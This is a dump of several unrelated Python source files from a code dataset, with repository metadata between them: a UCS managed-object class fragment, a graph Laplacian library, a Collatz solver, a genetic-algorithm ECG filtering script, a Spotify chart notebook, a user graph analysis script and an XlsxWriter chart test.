"ERR-session-cache-full", "ERR-session-not-found", "ERR-set-key-cert", "ERR-set-login-profile", "ERR-set-min-passphrase-length", "ERR-set-network", "ERR-set-password-strength-check", "ERR-set-port-channel", "ERR-store-pre-login-banner-msg", "ERR-tacacs-enable-error", "ERR-tacacs-global-set-error", "ERR-tacacs-group-set-error", "ERR-tacacs-plus-get-error", "ERR-tacacs-set-error", "ERR-test-error-1", "ERR-test-error-2", "ERR-timezone-set-error", "ERR-user-account-expired", "ERR-user-set-error", "ERR-xml-parse-error", "none"], ["0-4294967295"]),
"rmt_err_descr": MoPropertyMeta("rmt_err_descr", "rmtErrDescr", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rmt_rslt": MoPropertyMeta("rmt_rslt", "rmtRslt", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout),){0,32}(defaultValue|not-applicable|resource-unavailable|service-unavailable|intermittent-error|sw-defect|service-not-implemented-ignore|extend-timeout|capability-not-implemented-failure|illegal-fru|end-point-unavailable|failure|resource-capacity-exceeded|service-protocol-error|fw-defect|service-not-implemented-fail|task-reset|unidentified-fail|capability-not-supported|end-point-failed|fru-state-indeterminate|resource-dependency|fru-identity-indeterminate|internal-error|hw-defect|service-not-supported|fru-not-supported|end-point-protocol-error|capability-unavailable|fru-not-ready|capability-not-implemented-ignore|fru-info-malformed|timeout){0,1}""", [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302c, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version302c, MoPropertyMeta.READ_WRITE, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
}
prop_map = {
"childAction": "child_action",
"completionTime": "completion_time",
"currentFsm": "current_fsm",
"descr": "descr",
"dn": "dn",
"fsmStatus": "fsm_status",
"instanceId": "instance_id",
"progress": "progress",
"rmtErrCode": "rmt_err_code",
"rmtErrDescr": "rmt_err_descr",
"rmtRslt": "rmt_rslt",
"rn": "rn",
"sacl": "sacl",
"status": "status",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.child_action = None
self.completion_time = None
self.current_fsm = None
self.descr = None
self.fsm_status = None
self.instance_id = None
self.progress = None
self.rmt_err_code = None
self.rmt_err_descr = None
self.rmt_rslt = None
self.sacl = None
self.status = None
ManagedObject.__init__(self, "EquipmentSwitchIOCardFsm", parent_mo_or_dn, **kwargs)
| 87.738318 | 3,727 | 0.75703 |
795b997d8204e79adf618a4822d4276463cb7663 | 7,235 | py | Python | lib/graph.py | balcilar/cnn_graph | 9516e7c11d418b7873f9ac232faf678200dfcf7f | [
"MIT"
] | 1 | 2019-08-02T21:57:39.000Z | 2019-08-02T21:57:39.000Z | lib/graph.py | balcilar/cnn_graph | 9516e7c11d418b7873f9ac232faf678200dfcf7f | [
"MIT"
] | null | null | null | lib/graph.py | balcilar/cnn_graph | 9516e7c11d418b7873f9ac232faf678200dfcf7f | [
"MIT"
] | null | null | null | import sklearn.metrics
import sklearn.neighbors
import matplotlib.pyplot as plt
import scipy.sparse
import scipy.sparse.linalg
import scipy.spatial.distance
import numpy as np
def grid(m, dtype=np.float32):
"""Return the embedding of a grid graph."""
M = m**2
x = np.linspace(0, 1, m, dtype=dtype)
y = np.linspace(0, 1, m, dtype=dtype)
xx, yy = np.meshgrid(x, y)
z = np.empty((M, 2), dtype)
z[:, 0] = xx.reshape(M)
z[:, 1] = yy.reshape(M)
return z
def distance_scipy_spatial(z, k=4, metric='euclidean'):
"""Compute exact pairwise distances."""
d = scipy.spatial.distance.pdist(z, metric)
d = scipy.spatial.distance.squareform(d)
# k-NN graph.
idx = np.argsort(d)[:, 1:k+1]
d.sort()
d = d[:, 1:k+1]
return d, idx
def distance_sklearn_metrics(z, k=4, metric='euclidean'):
"""Compute exact pairwise distances."""
d = sklearn.metrics.pairwise.pairwise_distances(
z, metric=metric, n_jobs=1)
# k-NN graph.
idx = np.argsort(d)[:, 1:k+1]
d.sort()
d = d[:, 1:k+1]
return d, idx
def distance_lshforest(z, k=4, metric='cosine'):
"""Return an approximation of the k-nearest cosine distances."""
assert metric is 'cosine'
lshf = sklearn.neighbors.LSHForest()
lshf.fit(z)
dist, idx = lshf.kneighbors(z, n_neighbors=k+1)
assert dist.min() < 1e-10
dist[dist < 0] = 0
return dist, idx
# TODO: other ANNs s.a. NMSLIB, EFANNA, FLANN, Annoy, sklearn neighbors, PANN
def adjacency(dist, idx):
"""Return the adjacency matrix of a kNN graph."""
M, k = dist.shape
assert M, k == idx.shape
assert dist.min() >= 0
# Weights.
sigma2 = np.mean(dist[:, -1])**2
dist = np.exp(- dist**2 / sigma2)
# Weight matrix.
I = np.arange(0, M).repeat(k)
J = idx.reshape(M*k)
V = dist.reshape(M*k)
W = scipy.sparse.coo_matrix((V, (I, J)), shape=(M, M))
# No self-connections.
W.setdiag(0)
# Non-directed graph.
bigger = W.T > W
W = W - W.multiply(bigger) + W.T.multiply(bigger)
assert W.nnz % 2 == 0
assert np.abs(W - W.T).mean() < 1e-10
assert type(W) is scipy.sparse.csr.csr_matrix
return W
def replace_random_edges(A, noise_level):
"""Replace randomly chosen edges by random edges."""
M, M = A.shape
n = int(noise_level * A.nnz // 2)
indices = np.random.permutation(A.nnz//2)[:n]
rows = np.random.randint(0, M, n)
cols = np.random.randint(0, M, n)
vals = np.random.uniform(0, 1, n)
assert len(indices) == len(rows) == len(cols) == len(vals)
A_coo = scipy.sparse.triu(A, format='coo')
assert A_coo.nnz == A.nnz // 2
assert A_coo.nnz >= n
A = A.tolil()
for idx, row, col, val in zip(indices, rows, cols, vals):
old_row = A_coo.row[idx]
old_col = A_coo.col[idx]
A[old_row, old_col] = 0
A[old_col, old_row] = 0
A[row, col] = 1
A[col, row] = 1
A.setdiag(0)
A = A.tocsr()
A.eliminate_zeros()
return A
def laplacian(W, normalized=True):
"""Return the Laplacian of the weigth matrix."""
# Degree matrix.
d = W.sum(axis=0)
# Laplacian matrix.
if not normalized:
D = scipy.sparse.diags(d.A.squeeze(), 0)
L = D - W
else:
d += np.spacing(np.array(0, W.dtype))
d = 1 / np.sqrt(d)
D = scipy.sparse.diags(d.A.squeeze(), 0)
I = scipy.sparse.identity(d.size, dtype=W.dtype)
L = I - D * W * D
# assert np.abs(L - L.T).mean() < 1e-9
assert type(L) is scipy.sparse.csr.csr_matrix
return L
def lmax(L, normalized=True):
"""Upper-bound on the spectrum."""
if normalized:
return 2
else:
return scipy.sparse.linalg.eigsh(
L, k=1, which='LM', return_eigenvectors=False)[0]
def fourier(L, algo='eigh', k=1):
"""Return the Fourier basis, i.e. the EVD of the Laplacian."""
def sort(lamb, U):
idx = lamb.argsort()
return lamb[idx], U[:, idx]
if algo is 'eig':
lamb, U = np.linalg.eig(L.toarray())
lamb, U = sort(lamb, U)
elif algo is 'eigh':
lamb, U = np.linalg.eigh(L.toarray())
elif algo is 'eigs':
lamb, U = scipy.sparse.linalg.eigs(L, k=k, which='SM')
lamb, U = sort(lamb, U)
elif algo is 'eigsh':
lamb, U = scipy.sparse.linalg.eigsh(L, k=k, which='SM')
return lamb, U
def plot_spectrum(L, algo='eig'):
"""Plot the spectrum of a list of multi-scale Laplacians L."""
# Algo is eig to be sure to get all eigenvalues.
plt.figure(figsize=(17, 5))
for i, lap in enumerate(L):
lamb, U = fourier(lap, algo)
step = 2**i
x = range(step//2, L[0].shape[0], step)
lb = 'L_{} spectrum in [{:1.2e}, {:1.2e}]'.format(i, lamb[0], lamb[-1])
plt.plot(x, lamb, '.', label=lb)
plt.legend(loc='best')
plt.xlim(0, L[0].shape[0])
plt.ylim(ymin=0)
def lanczos(L, X, K):
"""
Given the graph Laplacian and a data matrix, return a data matrix which can
be multiplied by the filter coefficients to filter X using the Lanczos
polynomial approximation.
"""
M, N = X.shape
assert L.dtype == X.dtype
def basis(L, X, K):
"""
Lanczos algorithm which computes the orthogonal matrix V and the
tri-diagonal matrix H.
"""
a = np.empty((K, N), L.dtype)
b = np.zeros((K, N), L.dtype)
V = np.empty((K, M, N), L.dtype)
V[0, ...] = X / np.linalg.norm(X, axis=0)
for k in range(K-1):
W = L.dot(V[k, ...])
a[k, :] = np.sum(W * V[k, ...], axis=0)
W = W - a[k, :] * V[k, ...] - (
b[k, :] * V[k-1, ...] if k > 0 else 0)
b[k+1, :] = np.linalg.norm(W, axis=0)
V[k+1, ...] = W / b[k+1, :]
a[K-1, :] = np.sum(L.dot(V[K-1, ...]) * V[K-1, ...], axis=0)
return V, a, b
def diag_H(a, b, K):
"""Diagonalize the tri-diagonal H matrix."""
H = np.zeros((K*K, N), a.dtype)
H[:K**2:K+1, :] = a
H[1:(K-1)*K:K+1, :] = b[1:, :]
H.shape = (K, K, N)
Q = np.linalg.eigh(H.T, UPLO='L')[1]
Q = np.swapaxes(Q, 1, 2).T
return Q
V, a, b = basis(L, X, K)
Q = diag_H(a, b, K)
Xt = np.empty((K, M, N), L.dtype)
for n in range(N):
Xt[..., n] = Q[..., n].T.dot(V[..., n])
Xt *= Q[0, :, np.newaxis, :]
Xt *= np.linalg.norm(X, axis=0)
return Xt # Q[0, ...]
def rescale_L(L, lmax=2):
"""Rescale the Laplacian eigenvalues in [-1,1]."""
M, M = L.shape
I = scipy.sparse.identity(M, format='csr', dtype=L.dtype)
L /= lmax / 2
L -= I
return L
def chebyshev(L, X, K):
"""Return T_k X where T_k are the Chebyshev polynomials of order up to K.
Complexity is O(KMN)."""
M, N = X.shape
assert L.dtype == X.dtype
# L = rescale_L(L, lmax)
# Xt = T @ X: MxM @ MxN.
Xt = np.empty((K, M, N), L.dtype)
# Xt_0 = T_0 X = I X = X.
Xt[0, ...] = X
# Xt_1 = T_1 X = L X.
if K > 1:
Xt[1, ...] = L.dot(X)
# Xt_k = 2 L Xt_k-1 - Xt_k-2.
for k in range(2, K):
Xt[k, ...] = 2 * L.dot(Xt[k-1, ...]) - Xt[k-2, ...]
return Xt
| 27.934363 | 79 | 0.540981 |
795b9a507ea0f9641e8e77d09d76e99bd4bdbddf | 339 | py | Python | 0014/solve.py | Murgio/Project-Euler | c24935a697edfa98c20077bb4206f99a4c19ef52 | [
"MIT"
] | null | null | null | 0014/solve.py | Murgio/Project-Euler | c24935a697edfa98c20077bb4206f99a4c19ef52 | [
"MIT"
] | null | null | null | 0014/solve.py | Murgio/Project-Euler | c24935a697edfa98c20077bb4206f99a4c19ef52 | [
"MIT"
] | null | null | null | from tqdm import tqdm
def chain(n):
if n == 1:
return 1
if n % 2 == 0:
return 1 + chain(n/2)
return 1 + chain(3*n+1)
def sol(limit: int):
m = 0
num = 1
for i in tqdm(range(1, limit)):
c = chain(i)
if c > m:
m = c
num = i
return num
print(sol(int(1e6)))
| 16.95 | 35 | 0.451327 |
795b9beab8369f6cd281feeb246bc9d33f5cd028 | 10,555 | py | Python | src/.history/DSP_main_20201015183927.py | hassan-alhujhoj/ENEL420-GA-DSP | e550300bc671950f27909b499d440446a325326d | [
"MIT"
] | null | null | null | src/.history/DSP_main_20201015183927.py | hassan-alhujhoj/ENEL420-GA-DSP | e550300bc671950f27909b499d440446a325326d | [
"MIT"
] | null | null | null | src/.history/DSP_main_20201015183927.py | hassan-alhujhoj/ENEL420-GA-DSP | e550300bc671950f27909b499d440446a325326d | [
"MIT"
] | null | null | null | """
Genetic Algorithms for Digital Signal Processing
Created on Mon Oct 05 20:01:05 2020
Last Edited on Mon Oct 12 2020 by Luke Trenberth
TODO tidy up this code and to finalise it. Add up the third FIR filter method in here too.
"""
from os import major
import numpy as np
import matplotlib
from scipy import signal
from scipy.fftpack import fft
import matplotlib.pyplot as plt
import DSP_GA as ga
class DSP_Signal():
def __init__(self, filename, fs=1024, N_Coeff=400):
file = open(filename, "r")
self.y_0 = []
for line in file:
words = line.split(" ")
for word in words:
if word != "":
self.y_0.append(float(word))
self.fs = fs
self.N = len(self.y_0)
self.N_2 = int(self.N/2)
self.t = [x/self.fs for x in list(range(0, self.N))]
self.f = [x*self.fs/self.N for x in list(range(0, self.N_2))]
self.P_0 = np.var(self.y_0)
self.FFT_0 = fft(self.y_0)
self.N_Coeff = N_Coeff # Number of coefficients
#Window Filtering method for the data class
def WF(self, GA_data):
#GA Data: [noise_f_1, noise_f_2, width]
# Window Filtering
self.width_WF = 8 # Width of stop band, Hz
self.band_1 = [GA_data[0] -GA_data[2]/2, GA_data[0]+GA_data[2]/2] # Define band 1 bounds
self.band_2 = [GA_data[1] -GA_data[2]/2, GA_data[1]+GA_data[2]/2] # Define band 2 bounds
self.filter1_WF = signal.firwin(self.N_Coeff+1, self.band_1, window='hann', pass_zero='bandstop', fs=self.fs) # Filter for noise frequency 1
self.filter2_WF = signal.firwin(self.N_Coeff+1, self.band_2, window='hann', pass_zero='bandstop', fs=self.fs) # Filter for noise frequency 2
self.filter_WF = signal.convolve(self.filter1_WF, self.filter2_WF) # Combined filter for noise frequencies
self.y_WF = signal.lfilter(self.filter_WF, 1, self.y_0) # Apply noise filters to original data
self.f_WF, self.h_WF = signal.freqz(self.filter_WF, 1, fs=self.fs) #
self.FFT_WF = fft(self.y_WF)
return self.SNR(self.y_WF)
#Parks McLellan Filtering Method
def PM(self, GA_data, TW =3, BW=5):
# Filter Bands for filtering frequency 1 & 2
f_1 = GA_data[0]
f_2 = GA_data[1]
if len(GA_data) > 2:
TW = GA_data[2]
if len(GA_data) > 3:
BW = GA_data[3]
band1_PM = [0, f_1 -BW/2-TW, f_1 -BW/2, f_1+BW/2, f_1+BW/2+TW, self.fs/2]
band2_PM = [0, f_2 -BW/2-TW, f_2 -BW/2, f_2+BW/2, f_2+BW/2+TW, self.fs/2]
gain_PM = [1, 0, 1]
# Create filters for filtering frequency 1 & 2
filter1_PM = signal.remez(self.N_Coeff+1, band1_PM, gain_PM, fs=self.fs) # Filter frequency 1
filter2_PM = signal.remez(self.N_Coeff+1, band2_PM, gain_PM, fs=self.fs) # Filter frequency 2
filter_PM = signal.convolve(filter1_PM, filter2_PM) # Combined Filter
self.y_PM = signal.lfilter(filter_PM, 1, self.y_0) # Filter original data in time domain
self.f_PM, self.h_PM = signal.freqz(filter_PM, 1, fs=self.fs) # Return filter frequency response
self.FFT_PM = fft(self.y_PM) # Filtered data frequency domain response
return self.SNR(self.y_PM)
# TODO Frequency Sampling Filtering Method. THIS IS COPIED FROM ASSIGNMENT I.
def FS(self, fs):
trans_FS = 4 # Width of transition from pass band to stop band, Hz
width_FS = 8 # Width of the stop band, Hz
band1_FS = [0, noise_f[0] -width_FS/2-trans_FS, noise_f[0] -width_FS/2, noise_f[0]+width_FS/2, noise_f[0]+width_FS/2+trans_FS, fs/2]
band2_FS = [0, noise_f[1] -width_FS/2-trans_FS, noise_f[1] -width_FS/2, noise_f[1]+width_FS/2, noise_f[1]+width_FS/2+trans_FS, fs/2]
gain_FS = [1, 1, 0, 0, 1, 1] # Gain coefficients of bands
filter1_FS = signal.firwin2(N_Coeff+1, band1_FS, gain_FS, fs=fs) # Filter for noise frequency 1
filter2_FS = signal.firwin2(N_Coeff+1, band2_FS, gain_FS, fs=fs) # Filter for noise frequency 2
filter_FS = signal.convolve(filter1_FS, filter2_FS) # Filter for both noise frequencies
y_FS = signal.lfilter(filter_FS, 1, y_0) # Apply filter to time domain data
f_FS, h_FS = signal.freqz(filter_FS, 1, fs=fs) # Filter Response
FFT_FS = fft(y_FS) # Filtered Frequency Domain Response
return 0
# TODO maybe add IIR filtering method in here but that might be to much. Don't know tho.
def IIR(self, fs):
# The undesired frequencies and desired bandwidth of
freq1 = 31.456
freq2 = 74.36
BW = 5
deg1 = 2 * np.pi * (freq1 / fs)
deg2 = 2 * np.pi * (freq2 / fs)
r = 1 - (BW / fs) * np.pi
# Assign the coefficients for first and second filters
a = 1 * 1
b = (1 * -np.exp(-deg1 * 1j)) + (1 * -np.exp(deg1 * 1j))
c = (1 * -np.exp(-deg1 * 1j)) * (1 * -np.exp(deg1 * 1j))
d = 1 * 1 * 1j
e = (-r * np.exp(-deg1 * 1j)) + (-r * np.exp(deg1 * 1j))
f = (-r * np.exp(-deg1 * 1j)) * (-r * np.exp(deg1 * 1j))
g = 1 * 1
h = (-1 * np.exp(-deg2 * 1j)) + (-1 * np.exp(deg2 * 1j))
ii = (-1 * np.exp(-deg2 * 1j)) * (-1 * np.exp(deg2 * 1j))
j = 1 * 1
k = (-r * np.exp(-deg2 * 1j)) + (-r * np.exp(deg2 * 1j))
l = (-r * np.exp(-deg2 * 1j)) * (-r * np.exp(deg2 * 1j))
# Calculte the gain of the overall transfer function
Wf = 2 * np.pi * 10
ND_array = [np.exp(0), np.exp(np.i * Wf), np.exp(-2 * Wf)]
H_Z1_dot = np.dot(ND_array,[a, b, c])
H_Z2_dot = np.dot(ND_array, [d, e, f])
Gain = abs(H_Z2_dot / H_Z1_dot)
# convlute the the de/numerator of the first transfer function with de/numerator of the second funcion
NUM_Z = np.array( np.convolve( [a, b, c], [g, h, ii] ) )
DEN_Z = np.array( np.convolve( [d, e, f], [j, k, l] ) )
w, H = signal.freqz(Gain * NUM_Z, DEN_Z, self.N)
f = fs * w / (2 * np.pi)
return 0
#Returns a Signal to Noise Ratio for a given input Power
def SNR (self, y):
return self.P_0 - np.var(y)
# Plots a Fast Fourier Transform for simple graphing
def FFTplot(self, f, FFT, title="ECG Signal Frequency Spectrum"):
plt.figure()
plt.plot(f, abs(FFT)[:self.N_2])
plt.xlabel("Frequency (Hz)")
plt.ylabel("Voltage (uV)")
plt.title(title)
plt.show()
#The GA_filter function filters an input waveform
def GA_filter(waveform, input_num, solutions_per_population, mating_parent_number, num_generations):
# Defining the population size.
pop_size = (solutions_per_population,input_num) # The population will have sol_per_pop chromosome where each chromosome has num_weights genes.
#Creating the initial population.
new_population = ga.create_population(pop_size)
best_outputs = []
for generation in range(num_generations):
# Measuring the fitness of each chromosome in the population.
fitness = ga.cal_pop_fitness(waveform, new_population)
# The best result in the current iteration.
best_outputs.append(np.max(fitness))
# Selecting the best parents in the population for mating.
parents = ga.select_mating_pool(new_population, fitness,
mating_parent_number)
# Generating next generation using crossover.
offspring_crossover = ga.crossover(parents, offspring_size=(pop_size[0]-parents.shape[0], input_num))
# Adding some variations to the offspring using mutation.
offspring_mutation = ga.mutation(offspring_crossover, num_mutations=2)
# Creating the new population based on the parents and offspring.
new_population[0:parents.shape[0], :] = parents
new_population[parents.shape[0]:, :] = offspring_mutation
# if (generation < 20):
# print("{}\n {}\n\n".format(new_population, pop_fitness))
if (generation%10 == 0 and generation != 0):
print("{} Generations Completed".format(generation))
# Getting the best solution after iterating finishing all generations.
#At first, the fitness is calculated for each solution in the final generation.
fitness = ga.cal_pop_fitness(waveform, new_population)
# Then return the index of that solution corresponding to the best fitness.
best_match_idx = np.where(fitness == np.max(fitness))[0]
return new_population[best_match_idx, :], fitness[best_match_idx][0][0], best_outputs
# Implementation of a Parks-McLellan Filter using Genetic Algorithms
def main():
waveform = DSP_Signal("Signal_files/ECG15.txt")
# Fixed Parameters, found by trial and error s
f_count = 2
mating_parent_number = 3
pop_size = 20
num_generations = 10
my_dpi = 200 #dots per inch (resolution of an image)
# Conduct a Genetic Algorithm approximation
best_soln, best_soln_fitness, best_outputs = GA_filter(waveform,
f_count, pop_size,
mating_parent_number, num_generations)
print("Best solution : \n", best_soln)
print("Best solution fitness : \n", best_soln_fitness)
plt.figure(1)
plt.plot(best_outputs, "-k", label="Fittest Output")
plt.title("Fitness of ECG Signal using GA Algorithm")
plt.xlabel("Number of Iterations")
plt.ylabel("Fitness (Signal to Noise Ratio)")
plt.legend(loc="upper right")
plt.grid()
plt.show()
# plt.savefig('wiki/{}Gen{}Pop.png'.format(num_generations, pop_size))
plt.figure(2, figsize=(10, 10), dpi=my_dpi)
plt.plot(best_outputs, "-g", label="IIR Filter")
plt.title("IIR Filter")
plt.xlabel("Frequency (Hz)")
plt.ylabel("Magnitude (uV)")
plt.legend(loc="upper right")
plt.grid()
plt.savefig('wiki/IIR_magnitude.png', dpi = my_dpi)
plt.show()
waveform.FFTplot(waveform.f, waveform.FFT_0, title="Before filtering")
waveform.PM(best_soln[0])
waveform.FFTplot(waveform.f, waveform.FFT_PM, title="After Filtering")
main()
| 45.300429 | 149 | 0.604642 |
795b9e508d3752d358ce339165273de8a1151812 | 1,184 | py | Python | _build/jupyter_execute/curriculum-notebooks/Mathematics/StatisticsProject/AccessingData/spotify-popularity.py | BryceHaley/curriculum-jbook | d1246799ddfe62b0cf5c389394a18c2904383437 | [
"CC-BY-4.0"
] | 1 | 2022-03-18T18:19:40.000Z | 2022-03-18T18:19:40.000Z | _build/jupyter_execute/curriculum-notebooks/Mathematics/StatisticsProject/AccessingData/spotify-popularity.py | callysto/curriculum-jbook | ffb685901e266b0ae91d1250bf63e05a87c456d9 | [
"CC-BY-4.0"
] | null | null | null | _build/jupyter_execute/curriculum-notebooks/Mathematics/StatisticsProject/AccessingData/spotify-popularity.py | callysto/curriculum-jbook | ffb685901e266b0ae91d1250bf63e05a87c456d9 | [
"CC-BY-4.0"
] | null | null | null | 
<a href="https://hub.callysto.ca/jupyter/hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Fcallysto%2Fcurriculum-notebooks&branch=master&subPath=Mathematics/StatisticsProject/AccessingData/spotify-popularity.ipynb&depth=1" target="_parent"><img src="https://raw.githubusercontent.com/callysto/curriculum-notebooks/master/open-in-callysto-button.svg?sanitize=true" width="123" height="24" alt="Open in Callysto"/></a>
# Spotify Popularity
Using [Spotify data](https://spotifycharts.com/regional) we can see which songs are the most popular.
To look at just Canadian data, use the url `https://spotifycharts.com/regional/ca/daily/latest`
csv_url = 'https://spotifycharts.com/regional/global/daily/latest/download'
import pandas as pd
import requests
import io
r = requests.get(csv_url)
df = pd.read_csv(io.StringIO(r.text), skiprows=1)
df
[](https://github.com/callysto/curriculum-notebooks/blob/master/LICENSE.md) | 56.380952 | 425 | 0.793919 |
795ba13042aeac3da7c4e7d01077ab574108d512 | 5,296 | py | Python | python_scripts/user_scaffold_analysis_mysql.py | gulyas/network_games_analysis | 2e6bdd2a2275702495af1c18043758193d94377b | [
"MIT"
] | null | null | null | python_scripts/user_scaffold_analysis_mysql.py | gulyas/network_games_analysis | 2e6bdd2a2275702495af1c18043758193d94377b | [
"MIT"
] | null | null | null | python_scripts/user_scaffold_analysis_mysql.py | gulyas/network_games_analysis | 2e6bdd2a2275702495af1c18043758193d94377b | [
"MIT"
] | 1 | 2021-03-30T18:39:08.000Z | 2021-03-30T18:39:08.000Z | """
Examines scaffold hypothesis on a particular user.
Uses data from the MySQL Database.
"""
import csv
import json
import numpy as np
import matplotlib.pyplot as plt
import igraph
PATH = "D:\\network_games\\"
SAVE_PATH = "D:\\network_games\\scaffold\\"
FILENAME = "scaffold_data_mysql.csv"
# Specify the name of the user whose data is needed to be processed
USER = "darigan17"
def parse_data(filename):
"""
Parses data from a tab delimited CSV file, assembles user graph
:param filename: Input file name
:return: The user and its edge usage graph
"""
with open(filename, 'r', encoding='utf-8') as csvfile:
csv_reader = csv.reader(csvfile, delimiter='\t')
print(f"Parsed file: {FILENAME}")
line_count = 0
user_count = 0
user_last_clicks = {}
user_graph = igraph.Graph()
for row in csv_reader:
# Ignoring header row
if line_count == 0:
print(f'Columns: {", ".join(row)}')
line_count += 1
# Ignoring data from other users
elif row[2] == USER:
line_count += 1
user = row[2]
article = row[3]
game = row[4]
# Add edge to the user graph
try:
user_graph.vs.find(article)
except ValueError:
user_graph.add_vertex(name=article)
if user_last_clicks.get('game', "") == game:
if user_last_clicks['article'] != article:
# Either add edge or increase its weight if it already exists
try:
e = user_graph.es.find(_source=user_last_clicks['article'], _target=article)
e['weight'] += 1
except ValueError:
user_graph.add_edge(source=user_last_clicks['article'], target=article, weight=1)
user_last_clicks = {"article": article, "game": game}
else:
continue
print(f"{user_count} users created")
return user_graph, user
def analyse_graph(user_graph, user):
"""
Analyses the scaffold graph of the current user.
"""
print("Analysing user graph...")
# Plotting degree distributions
degree_dist = np.bincount(user_graph.degree())
x = range(degree_dist.size)
fig = plt.figure()
fig.suptitle("Degree distribution")
plt.plot(x, degree_dist, c="blue")
plt.xlabel("Number of connections")
plt.ylabel("Number of nodes")
plt.xscale("log")
plt.yscale("log")
# plt.show()
fig.savefig(SAVE_PATH + f"mysql_{user}_dd.png")
plt.close(fig)
# Creating edge weight distribution
edge_weights = user_graph.es['weight']
counts = np.bincount(edge_weights)
x = range(counts.size)
fig, ax = plt.subplots()
ax.plot(x, counts, 'bo')
ax.set_xlabel("Weights (Number of uses)")
ax.set_ylabel("Occurrences (Number of edges with particular weight)")
ax.set_title("Edge weight distribution")
plt.yscale("log")
plt.xscale("log")
plt.grid()
fig.savefig(SAVE_PATH + f"mysql_{user}_ew.png")
# plt.show()
plt.close(fig)
# Creating subgraph by betweenness centrality
btwn = user_graph.betweenness(directed=True, weights=None)
ntile = np.percentile(btwn, 90)
sub_vs = user_graph.vs.select([v for v, b in enumerate(btwn) if b >= ntile])
sub_graph = user_graph.subgraph(sub_vs)
print(f'Generated subgraph with {sub_graph.vcount()} vertices and {sub_graph.ecount()} edges.')
# Plotting subgraph
# Coloring edges
colors = ["orange", "darkorange", "red", "blue"]
for e in sub_graph.es:
weight = e['weight']
if weight >= 15:
e['color'] = colors[3]
elif 8 <= weight < 15:
e['color'] = colors[2]
elif 3 <= weight < 8:
e['color'] = colors[1]
else:
e['color'] = colors[0]
# Clipping edge widths
edge_widths = np.clip(a=sub_graph.es['weight'], a_min=4, a_max=15)
# Styling graph
visual_style = {"bbox": (3000, 3000), "margin": 17, "vertex_color": 'grey', "vertex_size": 15,
"vertex_label_size": 4, "edge_curved": False, "edge_width": edge_widths}
# Set the layout
try:
layout = sub_graph.layout("fr")
visual_style["layout"] = layout
save_name = f'mysql_{user}_reduced.png'
igraph.plot(sub_graph, SAVE_PATH + save_name, **visual_style)
print(f"Graph from {user} analysed and plotted to {save_name}")
except MemoryError:
print(f"Memory error. Skipping to plot {user}'s graph.")
def load_graph(filename):
"""Loads graph from file"""
return igraph.load(filename)
def save_graph(graph):
"""Saves scaffold graph in GML format"""
igraph.save(graph, filename=SAVE_PATH + f'mysql_{USER}.gml')
def main():
# Complete analysis of the user
user_graph, user = parse_data(PATH + FILENAME)
analyse_graph(user_graph, user)
save_graph(user_graph)
# Load and analyse graph
# user_graph = load_graph(SAVE_PATH + f'mysql_{USER}.gml')
# analyse_graph(user_graph, USER)
if __name__ == '__main__':
main()
| 31.337278 | 109 | 0.599131 |
795ba1cad868c2c03dff4b5d9dd221b32fddf550 | 1,467 | py | Python | xlsxwriter/test/comparison/test_chart_str02.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | xlsxwriter/test/comparison/test_chart_str02.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | xlsxwriter/test/comparison/test_chart_str02.py | Rippling/XlsxWriter-1 | be8d1cb8f8b156cf87bbe5d591f1f5475804be44 | [
"BSD-2-Clause"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_str02.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file when the chart data contains strings."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'scatter'})
chart.axis_ids = [41671680, 41669376]
data = [
[1, 2, 'Foo', 4, 5],
[2, 4, 'Bar', 8, 10],
[3, 6, 'Baz', 12, 15],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
worksheet.write_column('C1', data[2])
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$B$1:$B$5',
})
chart.add_series({
'categories': '=Sheet1!$A$1:$A$5',
'values': '=Sheet1!$C$1:$C$5',
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| 25.293103 | 97 | 0.546694 |
795ba2cdf62e09c0415ea43fca2d26305c91f9d6 | 30,587 | py | Python | custom/apps/gsid/reports/sql_reports.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | custom/apps/gsid/reports/sql_reports.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
